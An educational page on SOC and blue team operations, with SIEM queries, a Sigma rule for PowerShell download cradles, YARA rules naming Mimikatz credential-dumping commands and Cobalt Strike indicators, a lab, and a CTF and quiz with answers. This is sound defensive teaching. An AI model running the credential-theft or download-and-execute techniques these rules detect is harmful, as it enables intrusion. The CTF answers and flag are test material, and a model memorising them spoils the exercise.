Blue Team & SOC Operations
The Security Operations Center (SOC) is the nerve center of an organization's defensive security capability. SOC analysts monitor, detect, investigate, and respond to security incidents around the clock. Blue team engineering goes further — building the detections, tuning the alerts, and designing the infrastructure that makes the SOC effective.
This page covers the operational structure of a SOC, the tools used for detection and investigation, how to build effective detection rules, and the metrics that measure SOC performance. If you want to understand what happens after an alert fires, this is where you start.
Related: Cybersecurity Overview | Red Team Operations | Active Directory | Malware Analysis
SOC Organizational Structure
SOC Tiers
Modern SOCs use a tiered model where analysts at different levels handle incidents of increasing complexity.
Roles and Responsibilities
| Tier | Title | Responsibilities | Skills Required | Avg Salary (US) |
|---|---|---|---|---|
| L1 | SOC Analyst | Monitor dashboards, triage alerts, execute playbooks, escalate | SIEM basics, networking, OS fundamentals | $55K-$75K |
| L2 | Incident Responder | Investigate escalated incidents, perform containment, correlate events | Log analysis, malware triage, forensics | $75K-$110K |
| L3 | Threat Hunter / Detection Engineer | Proactive hunting, build detection rules, tune SIEM, tool development | Advanced forensics, scripting, ATT&CK expertise | $110K-$160K |
| — | SOC Manager | Team leadership, metrics reporting, process improvement, vendor management | Leadership, communication, security strategy | $130K-$180K |
SIEM Platforms
Security Information and Event Management (SIEM) platforms aggregate logs from every source in the environment, correlate events, and trigger alerts.
SIEM Comparison
| Feature | Splunk Enterprise | Elastic SIEM | Microsoft Sentinel | QRadar |
|---|---|---|---|---|
| Deployment | On-prem / Cloud | On-prem / Cloud | Cloud-only (Azure) | On-prem / Cloud |
| Query Language | SPL | KQL / Lucene | KQL | AQL |
| Pricing Model | Data volume (GB/day) | Nodes / self-managed | Data ingestion (GB/day) | EPS (events/sec) |
| Strengths | Mature ecosystem, SPL power | Open source core, cost-effective | Azure integration, AI/ML | IBM ecosystem, compliance |
| Weaknesses | Expensive at scale | Complex cluster management | Azure lock-in | Declining market share |
| Best For | Large enterprise, complex analysis | Cost-conscious, technical teams | Microsoft-heavy environments | Regulated industries |
Splunk SPL Essentials
# Basic search — find failed logins in the last 24 hours
index=windows sourcetype=WinEventLog EventCode=4625
| stats count by src_ip, user
| sort -count
| where count > 10
# Detect Kerberoasting — TGS requests with RC4 encryption
index=windows sourcetype=WinEventLog EventCode=4769 Ticket_Encryption_Type=0x17
| where ServiceName != "$*"
| stats count by ServiceName, Client_Address
| where count > 5
# Detect lateral movement — PsExec-style service creation
index=windows sourcetype=WinEventLog EventCode=7045
| where Service_Name != "Windows Update" AND Service_Name != "BITS"
| table _time, ComputerName, Service_Name, Service_File_Name
# PowerShell suspicious commands
index=windows sourcetype=WinEventLog EventCode=4104
| search ScriptBlockText="*Invoke-Mimikatz*" OR ScriptBlockText="*Invoke-Kerberoast*"
| table _time, ComputerName, ScriptBlockText
# Network connection anomalies
index=firewall action=allowed dest_port=443
| stats count dc(dest_ip) as unique_destinations by src_ip
| where unique_destinations > 100Elastic SIEM / KQL
# KQL — Detect suspicious PowerShell execution
event.code: "4104" and powershell.file.script_block_text: (*downloadstring* or *invoke-expression* or *iex* or *bypass*)
# KQL — Failed authentication from multiple sources
event.code: "4625" | stats count by source.ip, user.name | where count > 10
# KQL — Process execution from unusual paths
process.executable: (*\\Temp\\* or *\\AppData\\* or *\\Downloads\\*) and not process.name: (chrome.exe or firefox.exe or msedge.exe)Microsoft Sentinel (KQL)
// Detect brute force attacks
SecurityEvent
| where EventID == 4625
| summarize FailedAttempts = count() by TargetAccount, IpAddress, bin(TimeGenerated, 1h)
| where FailedAttempts > 20
| project TimeGenerated, TargetAccount, IpAddress, FailedAttempts
// Detect anomalous sign-ins (Azure AD)
SigninLogs
| where ResultType != "0"
| summarize FailureCount = count() by UserPrincipalName, IPAddress, Location
| where FailureCount > 10
// Detect DCSync indicators
SecurityEvent
| where EventID == 4662
| where Properties has "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
| where SubjectUserName !endswith "$"
| project TimeGenerated, SubjectUserName, ObjectNameDetection Engineering
Detection engineering is the practice of building, testing, and maintaining detection rules that identify malicious activity with high precision and low false positive rates.
Detection Lifecycle
Sigma Rules
Sigma is a vendor-agnostic format for detection rules. Write once, convert to any SIEM platform.
# Sigma rule — Detect suspicious PowerShell execution
title: Suspicious PowerShell Download Cradle
id: 3b6ab547-8ec2-4991-b5b6-1e5d7fd6f5f3
status: production
description: Detects PowerShell commands commonly used to download and execute payloads
author: SOC Team
date: 2026/03/20
references:
- https://attack.mitre.org/techniques/T1059/001/
tags:
- attack.execution
- attack.t1059.001
logsource:
product: windows
category: ps_script
definition: 'Script Block Logging must be enabled'
detection:
selection_download:
ScriptBlockText|contains:
- 'DownloadString'
- 'DownloadFile'
- 'Invoke-WebRequest'
- 'wget '
- 'curl '
- 'Start-BitsTransfer'
selection_exec:
ScriptBlockText|contains:
- 'Invoke-Expression'
- 'IEX('
- 'IEX ('
- 'iex('
condition: selection_download and selection_exec
falsepositives:
- Legitimate admin scripts that download and execute
- Software deployment tools
level: high# Convert Sigma rules to SIEM-specific formats
# Install sigmac (Sigma converter)
pip install sigma-cli
# Convert to Splunk SPL
sigma convert -t splunk -p sysmon suspicious_powershell.yml
# Convert to Elastic KQL
sigma convert -t elasticsearch suspicious_powershell.yml
# Convert to Microsoft Sentinel KQL
sigma convert -t microsoft365defender suspicious_powershell.yml
# Bulk convert entire ruleset
sigma convert -t splunk -p sysmon rules/ --output splunk_rules/YARA Rules
YARA identifies and classifies malware based on textual or binary patterns. Used for file scanning, memory scanning, and threat hunting.
rule Mimikatz_Detection {
meta:
description = "Detects Mimikatz credential dumping tool"
author = "SOC Team"
severity = "critical"
reference = "https://attack.mitre.org/software/S0002/"
strings:
$s1 = "sekurlsa::logonpasswords" ascii wide
$s2 = "sekurlsa::wdigest" ascii wide
$s3 = "lsadump::dcsync" ascii wide
$s4 = "kerberos::golden" ascii wide
$s5 = "mimikatz" ascii wide nocase
$s6 = "gentilkiwi" ascii wide
// Byte patterns for packed/obfuscated variants
$b1 = { 4D 69 6D 69 6B 61 74 7A }
$b2 = { 6D 69 6D 69 6B 61 74 7A }
condition:
uint16(0) == 0x5A4D and // PE file
(any of ($s*)) or
(2 of ($b*))
}
rule Cobalt_Strike_Beacon {
meta:
description = "Detects Cobalt Strike beacon payloads"
author = "SOC Team"
severity = "critical"
strings:
$config = { 00 01 00 01 00 02 ?? ?? 00 02 00 01 00 02 ?? ?? }
$sleep_mask = "SleepMask" ascii
$pipe = "\\\\.\\pipe\\msagent_" ascii
condition:
uint16(0) == 0x5A4D and
($config or $sleep_mask or $pipe)
}Threat Intelligence
Threat Intelligence Lifecycle
Intelligence Types
| Type | Description | Example | Consumer |
|---|---|---|---|
| Strategic | High-level trends, motivations, geopolitics | "APT28 is targeting NATO defense contractors" | Leadership, CISO |
| Tactical | TTPs used by adversaries, mapped to ATT&CK | "Threat actors use DLL sideloading via OneDrive" | Detection engineers |
| Operational | Specific campaigns, timelines, infrastructure | "Campaign X uses domain evil.com, IP 1.2.3.4" | Incident responders |
| Technical | IOCs: hashes, IPs, domains, URLs | malware.exe SHA256: abc123... | SIEM, EDR, firewalls |
Threat Intel Platforms & Feeds
| Platform | Type | Cost | Strengths |
|---|---|---|---|
| MISP | Open source TIP | Free | Community sharing, STIX/TAXII |
| OpenCTI | Open source TIP | Free | Knowledge graph, ATT&CK mapping |
| AlienVault OTX | Community feed | Free | Large community, pulse system |
| VirusTotal | File/URL analysis | Free tier + Enterprise | Multi-AV scanning, behavior |
| Recorded Future | Commercial TIP | $$$$ | AI-powered, comprehensive |
| CrowdStrike Falcon Intel | Commercial feed | $$$ | Actor profiles, real-time alerts |
| Abuse.ch | Community feeds | Free | URLhaus, MalwareBazaar, ThreatFox |
Alert Triage Workflow
A structured triage workflow prevents alert fatigue and ensures consistent investigation quality.
Triage Checklist
## Alert Triage Template
### 1. Initial Assessment (< 5 minutes)
- [ ] Read alert title and description
- [ ] Check if source IP/user is known (VIP, service account, scanner)
- [ ] Check alert history — has this fired before? How was it resolved?
- [ ] Check threat intel — are IOCs in any feeds?
### 2. Context Gathering (< 15 minutes)
- [ ] Pivot on source IP: What other activity from this IP in the last 24h?
- [ ] Pivot on user: Is this normal behavior for this user/role?
- [ ] Pivot on destination: Is this a legitimate service/server?
- [ ] Check EDR: Any endpoint alerts on the same host?
- [ ] Check network: Any unusual traffic patterns?
### 3. Decision
- [ ] False Positive → Document, tune rule, close
- [ ] True Positive, benign → Document, close (consider policy)
- [ ] True Positive, malicious → Escalate, begin IRReducing Alert Fatigue
The average SOC receives 10,000+ alerts per day. Most are false positives. To combat fatigue:
- Tune rules aggressively — Every FP that repeats should be filtered
- Use risk scoring — Aggregate low-fidelity signals into high-confidence alerts
- Automate triage — SOAR playbooks handle repetitive investigation steps
- Enrich automatically — Auto-lookup IPs, hashes, domains against threat intel
- Track FP rates per rule — Rules above 90% FP rate need rewriting or removal
SOC KPIs and Metrics
Key Performance Indicators
| Metric | Definition | Target | How to Improve |
|---|---|---|---|
| MTTD (Mean Time to Detect) | Time from attack to first alert | < 24 hours | Better detection rules, more log sources |
| MTTR (Mean Time to Respond) | Time from alert to containment | < 4 hours | SOAR automation, clear playbooks |
| MTTA (Mean Time to Acknowledge) | Time from alert to analyst assignment | < 15 minutes | Proper staffing, alert routing |
| False Positive Rate | % of alerts that are benign | < 40% | Tune rules, add context, risk scoring |
| Detection Coverage | % of ATT&CK techniques with detections | > 70% | Gap analysis, new data sources |
| Alert Volume | Alerts per analyst per shift | < 50 actionable | Tune, deduplicate, automate |
| Dwell Time | Time attacker is undetected in network | < 7 days | Threat hunting, better visibility |
Log Sources and Visibility
A SOC is only as good as its data sources. Missing logs means missing attacks.
| Log Source | What It Shows | Critical Events |
|---|---|---|
| Windows Security Log | Authentication, process creation, object access | 4624, 4625, 4688, 4662, 4769 |
| Sysmon | Enhanced process, network, file monitoring | Event 1 (process), 3 (network), 11 (file create) |
| EDR Telemetry | Endpoint behavior, process trees, file writes | Varies by vendor |
| Firewall Logs | Network connections allowed/denied | Outbound to suspicious IPs/ports |
| DNS Logs | Domain resolution queries | Queries to known-bad domains, DGA patterns |
| Proxy/Web Gateway | HTTP/S traffic, URLs visited | Downloads of executables, C2 traffic |
| Email Gateway | Inbound/outbound email, attachments | Phishing attempts, malicious attachments |
| Cloud Audit Logs | API calls, IAM changes, resource creation | Privilege escalation, data access |
| Authentication Logs | SSO, MFA, VPN logins | Impossible travel, credential stuffing |
Critical: Enable These Logs
Many organizations lack visibility because key logs are not enabled:
- PowerShell Script Block Logging (Event 4104) — Reveals obfuscated PowerShell
- Sysmon — Provides process, network, and file visibility far beyond default Windows logging
- Windows command-line audit (Event 4688 with process command line) — Shows what processes are doing
- DNS query logging — Essential for detecting C2, tunneling, and DGA domains
SOAR (Security Orchestration, Automation, and Response)
SOAR platforms automate repetitive SOC tasks through playbooks.
| Platform | Type | Strengths |
|---|---|---|
| Splunk SOAR (Phantom) | Commercial | Deep Splunk integration |
| Microsoft Sentinel + Logic Apps | Cloud | Azure ecosystem |
| Cortex XSOAR (Palo Alto) | Commercial | Large integration library |
| Shuffle | Open source | Free, community-driven |
| TheHive | Open source | Case management + Cortex analyzers |
Example SOAR Playbook: Phishing Triage
Further Reading
- Red Team Operations — Understanding the adversary perspective
- Active Directory Attacks & Defense — AD-specific detections
- Malware Analysis — Deep dive into malware investigation
- Security Certifications — CySA+, GCIH, BTL1 for blue team
- Incident Response & Forensics — IR process and forensic techniques
Key Takeaway
- A SOC is only as good as its data sources — missing logs means missing attacks; enable Sysmon, PowerShell Script Block Logging, and DNS query logging before anything else
- Sigma rules provide vendor-agnostic detection: write once, convert to Splunk SPL, Elastic KQL, or Sentinel KQL with a single command
- The biggest enemy of a SOC is alert fatigue — tune aggressively, automate triage with SOAR, and track false positive rates per rule
Hands-On Lab
Lab: Build a Detection Engineering Pipeline
- Set up a free Elastic SIEM instance (or Wazuh) on a lab VM
- Configure Windows Event forwarding from a test workstation with Sysmon installed
- Write a Sigma rule to detect Mimikatz execution (look for process name or command-line patterns)
- Convert the Sigma rule to your SIEM's query language using
sigma convert - Deploy the detection rule in your SIEM
- Execute a Mimikatz simulation using Atomic Red Team (
Invoke-AtomicTest T1003.001) - Verify the alert fires, then tune it to reduce false positives from legitimate LSASS access
- Create a SOAR playbook that automatically enriches alerts with VirusTotal lookups
CTF Challenge
Challenge: The Phantom Lateral Movement
Your SIEM shows a successful logon (Event ID 4624, Logon Type 3) from workstation WS-042 to server SRV-DB-01 at 2:17 AM using the svc_sql account. No legitimate admin activity was scheduled. Investigate the alert and determine: Is this a true positive? What attack technique was used? What should be contained?
Hints:
- Check Event ID 4769 on the DC around 2:15 AM for TGS requests
- Look for Event ID 7045 on SRV-DB-01 for new service creation
- Check if
svc_sqlis a Kerberoastable service account
Answer
Event ID 4769 at 2:15 AM shows a TGS request for svc_sql with RC4 encryption (type 0x17) from WS-042 — Kerberoasting. The attacker cracked the service ticket offline and used the password for lateral movement. Event ID 7045 on SRV-DB-01 shows a new service BTOBTO created by svc_sql — PsExec-style execution. Contain: isolate WS-042 and SRV-DB-01, reset svc_sql password, convert to gMSA. Flag: CTF{kerberoast_lateral_move_detected}.
:::
Common Misconceptions
- "More alerts mean better security" — Alert volume without context creates fatigue. Quality (high true positive rate) matters more than quantity.
- "SIEM deployment means threats are detected" — A SIEM without tuned rules, sufficient log sources, and trained analysts is just an expensive log storage solution.
- "Threat hunting is just running queries" — True threat hunting starts with a hypothesis based on threat intelligence, systematically searches for evidence, and creates new detections from findings.
- "Sigma rules replace SIEM-specific rules" — Sigma provides portability, but converted rules often need platform-specific tuning for field names, log formats, and performance optimization.
- "L1 analysts just click buttons" — Effective L1 triage requires understanding networking, OS internals, and attacker TTPs. The role is the foundation of SOC effectiveness.
Quiz
1. What is the primary advantage of Sigma detection rules?
a) They are faster than native SIEM rules b) They are vendor-agnostic and can be converted to any SIEM platform c) They automatically block threats d) They replace YARA rules
Answer
b) Sigma rules are written in a universal YAML format and can be converted to Splunk SPL, Elastic KQL, Microsoft Sentinel KQL, and other SIEM query languages.
2. What SOC metric measures the time from an attack starting to the first alert firing?
a) MTTR (Mean Time to Respond) b) MTTD (Mean Time to Detect) c) MTTA (Mean Time to Acknowledge) d) SLA compliance rate
Answer
b) MTTD measures the elapsed time between when an attack begins and when the SOC's first alert fires. Lower MTTD means faster detection.
3. Which Windows Event ID reveals the full text of PowerShell scripts executed on a system?
a) 4624 b) 4688 c) 4104 d) 7045
Answer
c) Event ID 4104 (PowerShell Script Block Logging) captures the full text of every PowerShell script executed, including deobfuscated content. This is critical for detecting encoded or obfuscated PowerShell attacks.
4. What is the purpose of SOAR in a SOC?
a) Replacing analysts entirely b) Automating repetitive triage and response tasks through playbooks c) Storing log data more efficiently d) Training new analysts
Answer
b) SOAR (Security Orchestration, Automation, and Response) automates repetitive investigation steps like IOC enrichment, email quarantine, and IP blocking, freeing analysts for complex analysis.
5. What should a SOC do when a detection rule has a 95% false positive rate?
a) Ignore all alerts from that rule b) Disable the rule entirely c) Rewrite or tune the rule to improve precision, or remove it d) Increase the alert priority
Answer
c) A rule with 95% FP rate wastes analyst time and contributes to alert fatigue. It should be rewritten with more specific conditions, additional context filters, or removed if it cannot be improved.
:::
One-Liner Summary: The blue team's job is not to prevent every attack — it is to detect, contain, and recover faster than the attacker can cause damage.